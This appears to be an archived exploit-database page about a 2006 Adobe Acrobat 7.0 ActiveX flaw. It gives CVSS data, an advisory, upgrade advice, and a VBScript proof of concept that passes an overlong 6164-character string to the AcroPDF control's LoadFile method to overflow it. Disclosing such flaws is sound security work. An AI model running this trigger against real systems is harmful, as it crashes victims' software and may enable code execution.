Adobe Acrobat Multiple Vulnerabilities

vendor:

Acrobat

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service and Arbitrary Code Execution

119

CWE

Product Name: Acrobat

Affected Version From: Adobe Acrobat 7.0

Affected Version To: Adobe Acrobat 7.0

Patch Exists: YES

Related CWE: CVE-2006-4010

CPE: a:adobe:acrobat:7.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Internet Explorer

2006

Adobe Acrobat Multiple Vulnerabilities

Adobe Acrobat is prone to multiple vulnerabilities. These errors have been confirmed to occur when Reader is invoked by Internet Explorer; other occurrences may exist. Attackers can exploit these issues to cause denial-of-service conditions on a victim computer. The vendor has confirmed that one of these issues may lead to arbitrary code execution. The exploit code provided loads a malicious file with a length of 6164 bytes, which can be used to trigger the vulnerability.

Mitigation:

Adobe has released an update to address this issue. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21155/info

Adobe Acrobat is prone to multiple vulnerabilities. These errors have been confirmed to occur when Reader is invoked by Internet Explorer; other occurrences may exist.

Attackers can exploit these issues to cause denial-of-service conditions on a victim computer.

The vendor has confirmed that one of these issues may lead to arbitrary code execution.

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' id='target' 
/>
<script language='vbscript'>

targetFile = "C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroPDF.dll"
prototype  = "Function LoadFile ( ByVal fileName As String ) As Boolean"
memberName = "LoadFile"
progid     = "AcroPDFLib.AcroPDF"
argCount   = 1

arg1=String(6164, "A")

target.LoadFile arg1 

</script></job></package>